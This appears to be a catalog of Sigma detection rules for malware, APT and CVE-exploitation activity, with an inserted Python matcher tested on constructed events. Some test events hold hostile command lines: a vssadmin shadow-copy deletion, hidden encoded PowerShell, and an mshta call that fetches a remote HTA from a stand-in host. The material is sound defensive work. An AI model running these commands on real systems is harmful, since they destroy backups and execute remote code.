Potential Exploitation Attempt From Office ApplicationhighDetects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
CVE-2021-44077 POC Default Dropped FilehighDetects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)
Potential BlackByte Ransomware ActivityhighDetects command line patterns used by BlackByte ransomware in different operations
DarkSide Ransomware PatterncriticalDetects DarkSide Ransomware and helpers
Goofy Guineapig Backdoor IOChighDetects malicious indicators seen used by the Goofy Guineapig malware
Potential Goofy Guineapig Backdoor ActivityhighDetects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report.
REvil Kaseya Incident Malware PatternscriticalDetects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
Potential CVE-2023-21554 QueueJumper ExploitationhighDetects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code ExecutionmediumDetects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
Potential CVE-2022-26809 Exploitation AttempthighDetects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
Potential CVE-2022-29072 Exploitation AttempthighDetects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.
Potential Bumblebee Remote Thread CreationhighDetects remote thread injection events based on action seen used by bumblebee
ChromeLoader Malware ExecutionhighDetects execution of ChromeLoader malware via a registered scheduled task
Emotet Loader Execution Via .LNK FilehighDetects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. The ".lnk" file was delivered via phishing campaign.
Hermetic Wiper TG Process PatternshighDetects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
Raspberry Robin Subsequent Execution of CommandshighDetects raspberry robin subsequent execution of commands.
Raspberry Robin Initial Execution From External DrivehighDetects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
Serpent Backdoor Payload Execution Via Scheduled TaskhighDetects post exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
Potential Raspberry Robin Dot Ending FilehighDetects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin
FakeUpdates/SocGholish ActivityhighDetects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
MERCURY APT ActivityhighDetects suspicious command line patterns seen being used by MERCURY APT
MSMQ Corrupted Packet EncounteredhighDetects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)highDetects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)mediumDetects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXEmediumDetects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. Hunting Opportunity Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer LocationmediumDetects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.
Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe CreationhighDetects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.
Potential CVE-2023-36874 Exploitation - Fake Wermgr ExecutionhighDetects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874
CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension FilehighDetects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331
CVE-2023-40477 Potential Exploitation - .REV File CreationlowDetects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.
CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child ProcesshighDetects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
CVE-2023-40477 Potential Exploitation - WinRAR Application CrashmediumDetects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477
DarkGate - Autoit3.EXE File Creation By Uncommon ProcessmediumDetects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
DarkGate - Autoit3.EXE Execution ParametershighDetects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server.
Griffon Malware Attack PatterncriticalDetects process execution patterns related to Griffon malware as reported by Kaspersky
Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXEmediumDetects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
Pikabot Fake DLL Extension Execution Via Rundll32.EXEhighDetects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
Qakbot Regsvr32 Calc PatternhighDetects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
Potential Qakbot Rundll32 ExecutionhighDetects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity.
Qakbot Rundll32 Exports ExecutioncriticalDetects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
Qakbot Rundll32 Fake DLL Extension ExecutioncriticalDetects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
Qakbot Uninstaller ExecutionhighDetects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
Rorschach Ransomware Execution ActivitycriticalDetects Rorschach ransomware execution activity
SNAKE Malware Kernel Driver File IndicatorcriticalDetects SNAKE malware kernel driver file indicator
SNAKE Malware WerFault Persistence File CreationhighDetects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity
SNAKE Malware Installer Name IndicatorslowDetects filename indicators associated with the SNAKE malware as reported by CISA in their report
Potential SNAKE Malware Installation CLI Arguments IndicatorhighDetects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report
Potential SNAKE Malware Installation Binary IndicatorhighDetects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report
Potential SNAKE Malware Persistence Service ExecutionhighDetects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA.
Ursnif Redirection Of Discovery CommandshighDetects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
Potential Compromised 3CXDesktopApp ExecutionhighDetects execution of known compromised version of 3CXDesktopApp
Potential Suspicious Child Process Of 3CXDesktopApphighDetects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise
Potential Compromised 3CXDesktopApp Update ActivityhighDetects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
Diamond Sleet APT File Creation IndicatorshighDetects file creation activity that is related to Diamond Sleet APT activity
Diamond Sleet APT Process Activity IndicatorshighDetects process creation activity indicators related to Diamond Sleet APT
Diamond Sleet APT Scheduled Task CreationcriticalDetects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
Potential APT FIN7 Related PowerShell Script CreatedhighDetects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts
Potential APT FIN7 POWERHOLD ExecutionhighDetects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs
Potential POWERTRASH Script ExecutionhighDetects potential execution of the PowerShell script POWERTRASH
Potential APT FIN7 Reconnaissance/POWERTRASH Related ActivityhighDetects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution
Lace Tempest File IndicatorshighDetects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
Lace Tempest PowerShell Evidence EraserhighDetects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
Lace Tempest PowerShell LauncherhighDetects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
Lace Tempest Cobalt Strike DownloadhighDetects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
Lace Tempest Malware Loader ExecutionhighDetects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
Mint Sandstorm - AsperaFaspex Suspicious Process ExecutioncriticalDetects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
Mint Sandstorm - Log4J Wstomcat Process ExecutionhighDetects Log4J Wstomcat process execution as seen in Mint Sandstorm activity
Mint Sandstorm - ManageEngine Suspicious Process ExecutioncriticalDetects suspicious execution from ManageEngine as seen used by Mint Sandstorm
Potential APT Mustang Panda Activity Against Australian GovhighDetects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52
Onyx Sleet APT File Creation IndicatorshighDetects file creation activity that is related to Onyx Sleet APT activity
PaperCut MF/NG Exploitation Related IndicatorshighDetects exploitation indicators related to PaperCut MF/NG Exploitation
PaperCut MF/NG Potential ExploitationhighDetects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut
Peach Sandstorm APT Process Activity IndicatorshighDetects process creation activity related to Peach Sandstorm APT
UNC4841 - Email Exfiltration File PatternhighDetects filename pattern of email related data used by UNC4841 for staging and exfiltration
UNC4841 - Barracuda ESG Exploitation IndicatorshighDetects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
UNC4841 - Potential SEASPY ExecutioncriticalDetects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child ProcesshighDetects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File CreationmediumDetects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins GrouphighDetects execution of the "net.exe" command in order to add a group named "ESX Admins". This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group ActivityhighDetects any creation or modification to a windows domain group with the name "ESX Admins". This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
CVE-2024-50623 Exploitation Attempt - CleohighDetects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
DarkGate - Drop DarkGate Loader In C:\Temp DirectorymediumDetects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder.
File Creation Related To RAT ClientshighFile .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
Potential KamiKakaBot Activity - Lure Document ExecutionmediumDetects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
Kapeka Backdoor Loaded Via Rundll32.EXEhighDetects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
Kapeka Backdoor Scheduled Task CreationhighDetects Kapeka backdoor scheduled task creation based on attributes such as paths, commands line flags, etc.
Potential Raspberry Robin CPL Execution ActivityhighDetects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants.
Potential APT FIN7 Exploitation ActivitymediumDetects potential APT FIN7 exploitation activity as reported by Google. In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
Forest Blizzard APT - Process Creation ActivityhighDetects the execution of specific processes and command line combination. These were seen being created by Forest Blizzard as described by MSFT.
DNS Request From Windows Script HostlowDetects unusual domain resolutions originating from CScript/WScript that can identify malicious javascript files executing in an environment, often as a result from a phishing or watering hole attack.
Python Path Configuration File Creation - LinuxmediumDetects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
Python Path Configuration File Creation - MacOSmediumDetects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
Scheduled Task DeletionlowDetects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME
Remote Thread Creation Via PowerShellmediumDetects the creation of a remote thread from a Powershell process to another process
Python Path Configuration File Creation - WindowsmediumDetects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
Scheduled Task Created - FileCreationlowDetects the creation of a scheduled task via file creation.
Task Scheduler DLL Loaded By Application Located In Potentially Suspicious LocationlowDetects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory. The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object. Investigation of the loading application and its behavior is required to determining if its malicious.
Microsoft Excel Add-In LoadedlowDetects Microsoft Excel loading an Add-In (.xll) file
Microsoft Word Add-In LoadedlowDetects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.
WMI Module Loaded By Uncommon ProcesslowDetects WMI modules being loaded by an uncommon process
Dfsvc.EXE Network Connection To Non-Local IPsmediumDetects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs
Dfsvc.EXE Initiated Network Connection Over Uncommon PorthighDetects an initiated network connection over uncommon ports from "dfsvc.exe". A utility used to handled ClickOnce applications.
Dllhost.EXE Initiated Network Connection To Non-Local IP AddressmediumDetects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.
Network Connection Initiated By PowerShell ProcesslowDetects a network connection that was initiated from a PowerShell process. Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. Use this rule as a basis for hunting for anomalies.
PsExec Default Named PipelowDetects PsExec service default pipe creation
Uncommon PowerShell Hosts | medium | Detects alternate PowerShell hosts potentially bypassing detections that look for powershell.exe.
bXOR Operator Usage In PowerShell Command Line - PowerShell Classic | low | Detects PowerShell execution that makes use of the bxor (bitwise XOR) operator. Attackers might use it as an alternative obfuscation method to Base64-encoded commands. Investigate the CommandLine and process tree to determine if the activity is malicious.
WinAPI Library Calls Via PowerShell Scripts | medium | Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
WinAPI Function Calls Via PowerShell Scripts | medium | Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
Potential BOINC Software Execution (UC-Berkeley Signature) | informational | Detects the use of software that is related to the University of California, Berkeley, via metadata information. This indicates it may be related to BOINC software, which can be used maliciously if unauthorized.
Potential File Override/Append Via SET Command | low | Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. Attackers use this technique along with the append redirection operator ">>" in order to update the content of a file indirectly. Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to the contents of "example.txt". The typical use case of "set /p=" is to prompt the user for input.
Diskshadow Child Process Spawned | medium | Detects any child process spawned by "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" command to launch other applications.
ClickOnce Deployment Execution - Dfsvc.EXE Child Process | medium | Detects child processes of "dfsvc", which indicate a ClickOnce deployment execution.
Diskshadow Script Mode Execution | medium | Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that delete the shadow copies on the system. Investigate the content of the script and its location.
Microsoft Workflow Compiler Execution | medium | Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
Suspicious New Instance Of An Office COM Object | medium | Detects an svchost process spawning an instance of an Office application. This happens when the initial Word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. This can be used by malicious actors to create malicious Office documents with macros on the fly. (See the vba2clr project in the references.)
Import New Module Via PowerShell CommandLine | low | Detects usage of the "Import-Module" cmdlet in order to add new cmdlets to the current PowerShell session.
Unusually Long PowerShell CommandLine | low | Detects unusually long PowerShell command lines with a length of 1000 characters or more.
Potentially Suspicious PowerShell Child Processes | medium | Detects potentially suspicious child processes spawned by PowerShell. Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
Remote Access Tool - Ammy Admin Agent Execution | medium | Detects the execution of the Ammy Admin RMM agent for remote management.
Remote Access Tool - Cmd.EXE Execution via AnyViewer | medium | Detects execution of "cmd.exe" via the AnyViewer RMM agent in a remote management session.
Remote Access Tool - ScreenConnect Remote Command Execution - Hunting | medium | Detects remote binary or command execution via the ScreenConnect service. Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect.
Scheduled Task Creation From Potential Suspicious Parent Location | medium | Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location. Multiple malware strains have been seen exhibiting similar behavior in order to achieve persistence.
Elevated System Shell Spawned | medium | Detects when a shell program such as the Windows command prompt or PowerShell is launched with SYSTEM privileges. Use this rule to hunt for potentially suspicious processes.
Manual Execution of Script Inside of a Compressed File | medium | This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as the wscript and cscript binaries. In this query, the child process is the script interpreter that will execute the script. The script extensions are the standard extensions that Windows recognizes. Selections 1-3 cover three different execution scenarios: 1. compressed file opened using 7-Zip; 2. compressed file opened using WinRAR; 3. compressed file opened using native Windows File Explorer capabilities. When the malicious script is double-clicked, it is extracted to the respective directory, as signified by the CommandLine in each of the three selections, and then executed using the relevant script interpreter.
WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript | medium | Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript.
Arbitrary Command Execution Using WSL | medium | Detects potential abuse of the Windows Subsystem for Linux (WSL) binary as a Living off the Land binary in order to execute arbitrary Linux or Windows commands.
Cab File Extraction Via Wusa.EXE | medium | Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract a cab file using the "/extract" argument, which is no longer supported.
Scheduled Task Created - Registry | low | Detects the creation of a scheduled task via registry keys.
Command Executed Via Run Dialog Box - Registry | low | Detects execution of commands via the Run dialog box on Windows by checking values of the "RunMRU" registry key. This technique has been abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
OMIGOD SCX RunAsProvider ExecuteScript | high | Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed is created as a temp file in the /tmp folder with a scx* prefix, then invoked from the directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same scx* prefix. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
Privilege Escalation Preparation | medium | Detects suspicious shell commands indicating the information gathering phase in preparation for privilege escalation.
Invoke-Obfuscation CLIP+ Launcher | high | Detects obfuscated use of Clip.exe to execute PowerShell.
Invoke-Obfuscation STDIN+ Launcher | high | Detects obfuscated use of stdin to execute PowerShell.
Invoke-Obfuscation VAR+ Launcher | high | Detects obfuscated use of environment variables to execute PowerShell.
Invoke-Obfuscation COMPRESS OBFUSCATION | medium | Detects obfuscated PowerShell via COMPRESS OBFUSCATION.
Invoke-Obfuscation RUNDLL LAUNCHER | medium | Detects obfuscated PowerShell via RUNDLL LAUNCHER.
Invoke-Obfuscation Via Stdin | high | Detects obfuscated PowerShell via stdin in scripts.
Invoke-Obfuscation Via Use Clip | high | Detects obfuscated PowerShell via use of Clip.exe in scripts.
Invoke-Obfuscation Via Use MSHTA | high | Detects obfuscated PowerShell via use of MSHTA in scripts.
Invoke-Obfuscation Via Use Rundll32 | high | Detects obfuscated PowerShell via use of Rundll32 in scripts.
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION | high | Detects obfuscated PowerShell via VAR++ LAUNCHER.
File Creation by Office Applications | high | This rule monitors executable and script file creation by Office applications. Add more file extensions or magic bytes to the logic as needed.
Automated Turla Group Lateral Movement | medium | Detects automated lateral movement by the Turla group.
Quick Execution of a Series of Suspicious Commands | low | Detects multiple suspicious processes in a limited timeframe.
Metasploit Or Impacket Service Installation Via SMB PsExec | high | Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on the specific service installation.
Remote Schtasks Creation | medium | Detects remote execution via scheduled task creation or update on the destination host.
Rare Schtasks Creations | low | Detects rare scheduled task creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code.
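Several of the rows above describe detection logic concretely enough to run: the "set /p=" append trick, Diskshadow script mode and its child processes, the 1000-character PowerShell command line, "wusa.exe /extract", the SYSTEM-level shell, and the RunMRU registry value. The block below is an added example, not code from the page or from SigmaHQ: a small Sigma-style matcher (field|modifier keys, AND within a selection, OR across a list, `selection and not filter`) run over constructed Sysmon-like events. The rule bodies paraphrase the descriptions above; the real SigmaHQ detection blocks are not on this page, so the exact field names, modifiers and the conhost exclusion are assumptions.

```python
"""Sigma-style detection logic over constructed Sysmon-like events.

Added example, not code from the page or from SigmaHQ. Rule bodies paraphrase
the rule descriptions listed above; field names, modifiers and the conhost
exclusion are assumptions. Every event is constructed for the demo.
"""
import re


def match_value(value, mods, pattern):
    """Plain/contains/startswith/endswith compare case-insensitively, as in
    Sigma; the `re` modifier is a raw (case-sensitive) regex."""
    if "re" in mods:
        return re.search(pattern, str(value)) is not None
    v, p = str(value).lower(), str(pattern).lower()
    if "contains" in mods:
        return p in v
    if "startswith" in mods:
        return v.startswith(p)
    return v.endswith(p) if "endswith" in mods else v == p


def match_field(event, key, patterns):
    """'Field|mod|mod': a list of patterns is OR-ed unless `all` is set."""
    field, *mods = key.split("|")
    if field not in event:
        return False
    pats = patterns if isinstance(patterns, list) else [patterns]
    hits = [match_value(event[field], mods, p) for p in pats]
    return all(hits) if "all" in mods else any(hits)


def match_selection(event, selection):
    """A dict is AND over its fields; a list of dicts is OR over the dicts."""
    if isinstance(selection, list):
        return any(match_selection(event, s) for s in selection)
    return all(match_field(event, k, v) for k, v in selection.items())


def evaluate(rule, event):
    """Supports the conditions 'sel' and 'sel and not flt' (all these rules need)."""
    if event.get("category") != rule["logsource"]:
        return False
    det = rule["detection"]
    sel, flt = re.fullmatch(r"(\w+)(?: and not (\w+))?", det["condition"]).groups()
    hit = match_selection(event, det[sel])
    if hit and flt:
        hit = not match_selection(event, det[flt])
    return hit


def run(rules, events):
    """Sorted (event id, rule title) pairs for every rule that fires."""
    return sorted((e["id"], r["title"]) for e in events for r in rules if evaluate(r, e))


def rule(title, logsource, selection, flt=None):
    det = {"selection": selection, "condition": "selection"}
    if flt:
        det["filter"], det["condition"] = flt, "selection and not filter"
    return {"title": title, "logsource": logsource, "detection": det}


PC = "process_creation"
RULES = [  # paraphrased from the descriptions above; not the SigmaHQ logic
    rule("Potential File Override/Append Via SET Command", PC,
         {"CommandLine|contains|all": [" set ", "/p="]}),
    rule("Diskshadow Script Mode Execution", PC,
         {"Image|endswith": "\\diskshadow.exe", "CommandLine|re": r"\s[-/]s\b"}),
    rule("Diskshadow Child Process Spawned", PC,
         {"ParentImage|endswith": "\\diskshadow.exe"},
         flt={"Image|endswith": "\\conhost.exe"}),  # assumed benign exclusion
    rule("Unusually Long PowerShell CommandLine", PC,
         {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"], "CommandLine|re": r".{1000,}"}),
    rule("Cab File Extraction Via Wusa.EXE", PC,
         {"Image|endswith": "\\wusa.exe", "CommandLine|contains": "/extract:"}),
    rule("Elevated System Shell Spawned", PC,
         {"Image|endswith": ["\\cmd.exe", "\\powershell.exe", "\\pwsh.exe"],
          "User|contains": ["AUTHORI", "AUTORI"]}),  # matches NT AUTHORITY\SYSTEM
    rule("Command Executed Via Run Dialog Box - Registry", "registry_set",
         {"TargetObject|contains": "\\CurrentVersion\\Explorer\\RunMRU\\",
          "Details|contains": ["powershell", "pwsh", "mshta", "cmd "]}),
]

W = "C:\\Windows\\System32\\"
PS = W + "WindowsPowerShell\\v1.0\\powershell.exe"


def ev(i, image, parent, cmd, user="CORP\\alice"):
    return {"id": i, "category": PC, "Image": image, "ParentImage": parent,
            "CommandLine": cmd, "User": user}


EVENTS = [  # constructed telemetry, not captured from a real host
    ev(1, W + "cmd.exe", "C:\\Windows\\explorer.exe",
       'cmd /c >> C:\\Users\\Public\\notes.txt set /p="test data"'),
    ev(2, W + "diskshadow.exe", W + "cmd.exe", "diskshadow.exe -s C:\\ProgramData\\ds.txt"),
    ev(3, W + "conhost.exe", W + "diskshadow.exe", "\\??\\C:\\Windows\\system32\\conhost.exe 0x4"),
    ev(4, W + "cmd.exe", W + "diskshadow.exe", "cmd.exe /c vssadmin delete shadows /all /quiet"),
    ev(5, PS, W + "wscript.exe", "powershell.exe -nop -w hidden -enc " + "QQ" * 600),
    ev(6, W + "wusa.exe", W + "cmd.exe", "wusa.exe update.cab /extract:C:\\Windows\\Temp\\x"),
    ev(7, PS, W + "svchost.exe", "powershell.exe -ep bypass -File C:\\Windows\\Temp\\run.ps1",
       user="NT AUTHORITY\\SYSTEM"),
    {"id": 8, "category": "registry_set", "Details": "mshta https://captcha.example.invalid/v.hta\\1",
     "TargetObject": "HKU\\S-1-5-21-1-2-3-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a"},
    ev(9, W + "notepad.exe", "C:\\Windows\\explorer.exe", "notepad.exe C:\\Users\\alice\\todo.txt"),
]

if __name__ == "__main__":
    for eid, title in run(RULES, EVENTS):
        print(f"event {eid}: {title}")
```

Running it fires seven alerts (events 1, 2, 4, 5, 6, 7 and 8); event 3 is suppressed by the filter because conhost.exe is spawned for every console process, and event 9 matches nothing. The `logsource` check matters: the RunMRU rule only looks at registry_set events, so a command line containing "RunMRU" would not trip it.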
attack.persistence 564
Title | Level | Description
Edit of .bash_profile and .bashrc | medium | Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.
SCM DLL Sideload | medium | Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system.
